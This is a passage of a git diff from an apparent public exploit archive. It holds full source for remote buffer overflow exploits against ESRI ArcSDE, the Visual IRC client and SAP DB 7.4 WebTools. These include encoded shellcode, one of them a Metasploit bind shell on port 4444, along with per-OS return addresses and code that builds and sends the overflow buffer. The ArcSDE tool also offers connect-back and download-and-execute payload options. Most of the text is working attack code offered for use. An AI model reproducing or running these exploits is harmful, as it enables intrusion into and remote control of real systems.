optind++; + + if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0') + { + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + if (strcmp(argv[optind], "--") == 0) + { + optind++; + optarg = NULL; + if (optind < argc) + optarg = argv[optind]; + return EOF; + } + + next = argv[optind]; + next++; // skip past - + optind++; + } + + char c = *next++; + char *cp = strchr(optstring, c); + + if (cp == NULL || c == ':') + return '?'; + + cp++; + if (*cp == ':') 
+ {
+ if (*next != '\0')
+ {
+ optarg = next;
+ next = NULL;
+ }
+ else if (optind < argc)
+ {
+ optarg = argv[optind];
+ optind++;
+ }
+ else
+ {
+ return '?';
+ }
+ }
+
+ return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void usage(char * s)
+{
+ printf(" Usage : %s -h -p -s -t -I -P -u \n", s);
+ printf(" Arguments:\n");
+ printf(" -h host to connect\n");
+ printf(" -p port (default: 5151)\n");
+ printf(" -s select shellcode (default: 1)\n");
+ printf(" -t target to attack\n");
+ printf(" -I reverse IP for the connect-back shellcode\n");
+ printf(" -P reverse port for the connect-back shellcode\n");
+ printf(" -u url for executable for DAX shellcode\n\n");
+ printf(" Shellcodes:\n");
+ for(int i=0; shellcodes[i].name!=0;i++)
+ {
+ printf(" %d. %s\n",i+1,shellcodes[i].name);
+ }
+ printf("\n");
+ printf(" Targets:\n");
+ for(int j=0; targets[j].t!=0;j++)
+ {
+ printf(" %d. %s\n",j+1,targets[j].t);
+ }
+ printf("\n");
+ end_logo();
+}
+
+void logo()
+{
+ printf("\n\n");
+ printf(" ####################################################################### \n");
+ printf(" # ____ __ _ ______ __ _____ #\n");
+ printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
+ printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
+ printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
+ printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
+ printf(" # crew #\n");
+ printf(" ####################################################################### \n");
+ printf(" # Exploit : ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow # \n");
+ printf(" # Solution: ESRI ArcSDE 9.2 sp2 is invulnerable # \n");
+ printf(" # Author : Heretic2 (heretic2x@gmail.com # \n");
+ printf(" # THANKS : iDefense, Zero-tolerance, Metasploit project and anghell # \n");
+ printf(" # Research: iDefense # \n");
+ printf(" # Version : 1.0 Public Release # \n");
+ printf(" # System : Windows ALL # \n");
+ printf(" # Date : 26.06.2007 # \n");
+ printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+ printf(" # ------------------------------------------------------------------- # \n");
+ printf(" # Dreatica-FXP crew [Heretic2] # \n");
+ printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2007-07-03]
diff --git a/platforms/windows/remote/4152.py b/platforms/windows/remote/4152.py
index 352c9900b..6e5c36188 100755
--- a/platforms/windows/remote/4152.py
+++ b/platforms/windows/remote/4152.py
@@ -1,145 +1,145 @@ -#!/usr/bin/python -# ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on Visual IRC 2.0 / 2k SP4 Polish -# Shellcode type: Windows Execute Command (calc.exe) -# How stuff works ? .. -# -# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server] -# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server] -# -# Details: -# "#channel :" + "A" * 4116 -# 0x41414141 Pointer to next SEH record -# 0x41414141 SE handler -## - -from thread import start_new_thread -from struct import pack -from string import find -from string import join -from socket import * - -LEN_RECV = 65536 - -in_addr = '0.0.0.0' # local address -in_port = 6667 # local port -out_addr = '192.168.0.2' # address of IRC server -out_port = 6667 # port of IRC server - -shellcode = ( -"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" -"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" -"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" -"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" -"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" -"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" -"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" -"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" -"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" -"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" -"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") - -NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 -SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) - -buf = "A" * 4108 -buf += pack(" +# Tested on Visual IRC 2.0 / 2k SP4 Polish +# Shellcode type: Windows Execute Command (calc.exe) +# How stuff works ? .. +# +# [ViRC] -----> (..JOIN..) 
-------------> [exploit_tunnel] -----------------------------> [Real IRC server] +# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server] +# +# Details: +# "#channel :" + "A" * 4116 +# 0x41414141 Pointer to next SEH record +# 0x41414141 SE handler +## + +from thread import start_new_thread +from struct import pack +from string import find +from string import join +from socket import * + +LEN_RECV = 65536 + +in_addr = '0.0.0.0' # local address +in_port = 6667 # local port +out_addr = '192.168.0.2' # address of IRC server +out_port = 6667 # port of IRC server + +shellcode = ( +"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8" +"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1" +"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07" +"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25" +"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5" +"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d" +"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4" +"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0" +"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c" +"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b" +"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4") + +NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 +SE_HANDLER = 0x7CEA41D3 # POP POP RET (SHELL32.DLL / 2k SP4 Polish) + +buf = "A" * 4108 +buf += pack(" -#include -#include -#include -#include -#pragma comment(lib,"ws2_32") - - -void usage(char * s); -void logo(); -void end_logo(); -void prepare_shellcode(unsigned char * fsh, int sh); -void make_buffer(unsigned char * buf, int itarget, int sh); -int send_buffer(unsigned char * buf, char * remotehost, int port); -SOCKET do_connect (char *remotehost, int port); -int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); - -static long timeout = 2000 ; // 2 sec 
- - -// ----------------------------------------------------------------- -// XGetopt.cpp Version 1.2 -// ----------------------------------------------------------------- -int getopt(int argc, char *argv[], char *optstring); -char *optarg; // global argument pointer -int optind = 0, opterr; // global argv index -// ----------------------------------------------------------------- -// ----------------------------------------------------------------- - - - -struct _target{ - const char *t ; - unsigned long ret ; -} targets[]= - { - {"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]", 0x1003a218 },// call ebx - {"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx - {"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx - {"Debug / DoS", 0x42424242 }, - {NULL, 0x00000000 } - }; - - -struct { - const char * name; - int length; - char * shellcode; -}shellcodes[]={ - {"Bindshell, port 4444 [ args: none ]", 696, - /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" - "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" - "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" - "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" - "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" - "\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" - "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" - "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" - "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" - "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" - "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" - "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" - "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" - "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" - 
"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" - "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" - "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" - "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" - "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" - "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" - "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" - "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" - "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" - "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" - "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" - "\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" - "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" - "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" - "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" - "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" - "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" - "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" - "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" - "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" - "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" - "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" - "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" - "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" - "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" - "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" - "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" - "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" - "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" 
- "\x4f\x6a\x76\x6b\x4f\x78\x50\x42"
- },
- {NULL , NULL }
-};
-
-
-
-int main(int argc, char **argv)
-{
- char * remotehost=NULL;
- char default_remotehost[]="127.0.0.1";
- char temp1[100], temp2[100];
- int port, itarget, sh;
- SOCKET s;
- char c;
- int option_index=0;
- logo();
- WSADATA wsa;
- WSAStartup(MAKEWORD(2,0), &wsa);
- if(argc<2)
- {
- usage(argv[0]);
- return -1;
- }
-
- // set defaults
- port=9999;
- itarget=-1;
- sh=0;
- // ------------
-
- while((c = getopt(argc, argv, "h:p:t:"))!= EOF)
- {
- switch (c)
- {
- case 'h':
- remotehost=optarg;
- break;
- case 't':
- sscanf(optarg, "%d", &itarget);
- itarget--;
- break;
- case 'p':
- sscanf(optarg, "%d", &port);
- break;
- default:
- usage(argv[0]);
- WSACleanup();
- return -1;
- }
- }
- if(remotehost == NULL) remotehost=default_remotehost;
- memset(temp1,0,sizeof(temp1));
- memset(temp2,0,sizeof(temp2));
- memset(temp1, '\x20' , 58 - strlen(remotehost) -1);
- printf(" # Host : %s%s# \n", remotehost, temp1);
- sprintf(temp2, "%d", port);
- memset(temp1,0,sizeof(temp1));
- memset(temp1, '\x20' , 58 - strlen(temp2) -1);
- printf(" # Port : %s%s# \n", temp2, temp1);
- memset(temp1,0,sizeof(temp1));
- memset(temp2,0,sizeof(temp2));
- sprintf(temp2, "%s", shellcodes[sh].name );
- memset(temp1, '\x20' , 58 - strlen(temp2) -1);
- printf(" # Payload : %s%s# \n", temp2, temp1);
- if(itarget!=-1)
- {
- memset(temp1,0,sizeof(temp1));
- memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);
- printf(" # Target : %s%s# \n", targets[itarget].t, temp1);
- }else
- {
- memset(temp1,0,sizeof(temp1));
- memset(temp1, '\x20' , 58 - strlen("Please select target") -1);
- printf(" # Target : %s%s# \n", "Please select target", temp1);
- }
- printf(" # ------------------------------------------------------------------- # \n");
- fflush(stdout);
- printf(" [+] Checking if server is online\n");
- fflush(stdout);
- s=do_connect(remotehost, port);
- if(s==-1)
- {
- printf(" [-] Server is OFFLINE\n");
- end_logo();
- return 0;
- }
- closesocket(s);
- printf(" [+] Server is ONLINE\n");
-
-
- unsigned char buf[30000];
- memset(buf,0,sizeof(buf));
- fflush(stdout);
-
- make_buffer(buf, itarget, sh);
- printf(" [+] Attacking buffer constructed\n");
- if(send_buffer(buf, remotehost,port)==-1)
- {
- printf(" [-] Cannot exploit server %s\n", remotehost);
- end_logo();
- WSACleanup();
- return -1;
- }
-
- printf(" [+] Buffer sent\n");
- printf(" [+] Connect to %s:%d\n", remotehost, 4444);
- end_logo();
- WSACleanup();
- return 0;
-}
-
-
-
-SOCKET do_connect (char *remotehost, int port)
-{
- static struct hostent *host;
- static struct sockaddr_in addr;
- SOCKET s;
- host = gethostbyname(remotehost);
- if (!host)
- {
- perror("[-] gethostbyname() failed");
- return -1;
- }
- addr.sin_addr = *(struct in_addr*)host->h_addr;
-
- s = socket(PF_INET, SOCK_STREAM, 0);
- if (s == -1)
- {
- closesocket(s);
- perror("socket() failed");
- return -1;
- }
-
- addr.sin_port = htons(port);
- addr.sin_family = AF_INET;
-
- if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
- {
- closesocket(s);
- return -1;
- }
-
- return s;
-}
-
-
-void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
-{
- memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
- *fshlength = shellcodes[sh].length;
-}
-
-void make_buffer(unsigned char * buf, int itarget, int sh)
-{
- // prepare shellcode
- unsigned char fsh[10000];
- unsigned int fshlength;
- memset(fsh, 0, sizeof(fsh));
- prepare_shellcode(fsh, &fshlength, sh);
- // -----------------
-
- // make buffer
- unsigned char * cp=buf;
-
- // HTTP request
- memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE="));
- cp +=strlen((char *)cp);
-
- // long request
- memset(cp, 'A', 20774);
- cp +=strlen((char *)cp);
-
- // jmp over 6 bytes
- *cp++ = '\x90';
- *cp++ = '\x90';
- *cp++ = '\xEB';
- *cp++ = '\x06';
-
-
- // SEH handler
- *cp++ = (char)((targets[itarget].ret ) & 0xff);
- *cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
- *cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
- *cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
-
- // jff
- *cp++ = '\x90';
- *cp++ = '\x90';
- *cp++ = '\x90';
- *cp++ = '\x90';
-
- // copy shellcode
- memcpy(cp, fsh, fshlength);
- cp+=fshlength;
-
- // end of HTTP request
- memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n"));
- cp +=strlen((char *)cp);
- // -----------------
-}
-
-
-
-int send_buffer(unsigned char * buf, char * remotehost, int port)
-{
- SOCKET sock;
- int bytes;
-
- sock = do_connect(remotehost, port);
- if(sock==-1) printf(" [-] Failed to connect to server\n");
- bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0);
- if (bytes<0) printf(" [-] Failed to send the buffer\n"); else printf(" [+] Sent %d bytes\n", bytes);
- closesocket(sock);
- return 1;
-}
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
- static char *next = NULL;
- if (optind == 0)
- next = NULL;
-
- optarg = NULL;
-
- if (next == NULL || *next == '\0')
- {
- if (optind == 0)
- optind++;
-
- if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
- {
- optarg = NULL;
- if (optind < argc)
- optarg = argv[optind];
- return EOF;
- }
-
- if (strcmp(argv[optind], "--") == 0)
- {
- optind++;
- optarg = NULL;
- if (optind < argc)
- optarg = argv[optind];
- return EOF;
- }
-
- next = argv[optind];
- next++; // skip past -
- optind++;
- }
-
- char c = *next++;
- char *cp = strchr(optstring, c);
-
- if (cp == NULL || c == ':')
- return '?';
-
- cp++;
- if (*cp == ':')
- {
- if (*next != '\0')
- {
- optarg = next;
- next = NULL;
- }
- else if (optind < argc)
- {
- optarg = argv[optind];
- optind++;
- }
- else
- {
- return '?';
- }
- }
-
- return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-void usage(char * s)
-{
- printf(" Usage : %s -h -p -t \n", s);
- printf(" Arguments:\n");
- printf(" -h host to connect\n");
- printf(" -p port (default: 9999)\n");
- printf(" -t target to attack\n");
- printf(" Shellcodes:\n");
- for(int i=0; shellcodes[i].name!=0;i++)
- {
- printf(" %d. %s\n",i+1,shellcodes[i].name);
- }
- printf("\n");
- printf(" Targets:\n");
- for(int j=0; targets[j].t!=0;j++)
- {
- printf(" %d. %s\n",j+1,targets[j].t);
- }
- printf("\n");
- end_logo();
-}
-
-void logo()
-{
- printf("\n\n");
- printf(" ####################################################################### \n");
- printf(" # ____ __ _ ______ __ _____ #\n");
- printf(" # / __ \\________ _____/ /_(_)_________ / __/\\ \\/ / / _ / #\n");
- printf(" # / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___ / / \\ / / // / #\n");
- printf(" # / /_/ / / / ___/ /_// /_/ / /__/ /_// /__/ / _/ / \\ / ___/ #\n");
- printf(" # /_____/_/ \\___/ \\_,_/\\__/_/\\___/\\__,_/ /_/ /_/\\_\\/_/ #\n");
- printf(" # crew #\n");
- printf(" ####################################################################### \n");
- printf(" # Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit # \n");
- printf(" # Author : Heretic2 (heretic2x@gmail.com # \n");
- printf(" # Research: NGSSoftware Insight Security Research # \n");
- printf(" # Version : 1.0 Public Release # \n");
- printf(" # System : Windows 2000 ALL SP # \n");
- printf(" # Date : 07.07.2007 # \n");
- printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
- printf(" # ------------------------------------------------------------------- # \n");
- printf(" # Dreatica-FXP crew [Heretic2] # \n");
- printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2007-07-07]
+/* Dreatica-FXP crew
+*
+* ----------------------------------------
+* Target : SAP DB 7.4 WebTools
+* Site : http://www.sapdb.org
+* Found by : NGSSoftware Insight Security Research
+* ----------------------------------------
+* Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit
+* Exploit date : 07.07.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS : Windows 2000 ALL SP
+* Crew : Dreatica-FXP
+* ----------------------------------------
+* Info : This is the SEH overwrite realization of the vulnerability found by
+* NGSSoftware Insight Security Research, it is trivial. We send a big amount
+* of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
+* byte we trigger an exception and our shellcode is executed.
+* ----------------------------------------
+* Compiling :
+* To compile this exploit you need:
+* 1. Windows C/C++ compiler
+* 2. WinSock 2
+* ----------------------------------------
+* Thanks to :
+* 1. NGSSoftware Insight Security Research ( http://www.ngssoftware.com/ )
+* 2. The Metasploit project ( http://metasploit.com )
+* 3. Dreatica-FXP crew ( http://www.dreatica.cl )
+* ----------------------------------------
+* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be
+* responsible for any damage, caused by that code. 
+************************************************************************************ +*/ + +#include +#include +#include +#include +#include +#pragma comment(lib,"ws2_32") + + +void usage(char * s); +void logo(); +void end_logo(); +void prepare_shellcode(unsigned char * fsh, int sh); +void make_buffer(unsigned char * buf, int itarget, int sh); +int send_buffer(unsigned char * buf, char * remotehost, int port); +SOCKET do_connect (char *remotehost, int port); +int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded ); + +static long timeout = 2000 ; // 2 sec + + +// ----------------------------------------------------------------- +// XGetopt.cpp Version 1.2 +// ----------------------------------------------------------------- +int getopt(int argc, char *argv[], char *optstring); +char *optarg; // global argument pointer +int optind = 0, opterr; // global argv index +// ----------------------------------------------------------------- +// ----------------------------------------------------------------- + + + +struct _target{ + const char *t ; + unsigned long ret ; +} targets[]= + { + {"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]", 0x1003a218 },// call ebx + {"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx + {"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx + {"Debug / DoS", 0x42424242 }, + {NULL, 0x00000000 } + }; + + +struct { + const char * name; + int length; + char * shellcode; +}shellcodes[]={ + {"Bindshell, port 4444 [ args: none ]", 696, + /* win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49" + "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42" + "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32" + "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62" + "\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71" + 
"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c" + "\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47" + "\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35" + "\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c" + "\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a" + "\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a" + "\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64" + "\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34" + "\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50" + "\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64" + "\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31" + "\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69" + "\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30" + "\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78" + "\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f" + "\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73" + "\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e" + "\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62" + "\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71" + "\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65" + "\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32" + "\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e" + "\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69" + "\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79" + "\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d" + "\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49" + "\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70" + "\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45" + "\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36" 
+ "\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32" + "\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e" + "\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50" + "\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32" + "\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a" + "\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48" + "\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30" + "\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39" + "\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b" + "\x4f\x6a\x76\x6b\x4f\x78\x50\x42" + }, + {NULL , NULL } +}; + + + +int main(int argc, char **argv) +{ + char * remotehost=NULL; + char default_remotehost[]="127.0.0.1"; + char temp1[100], temp2[100]; + int port, itarget, sh; + SOCKET s; + char c; + int option_index=0; + logo(); + WSADATA wsa; + 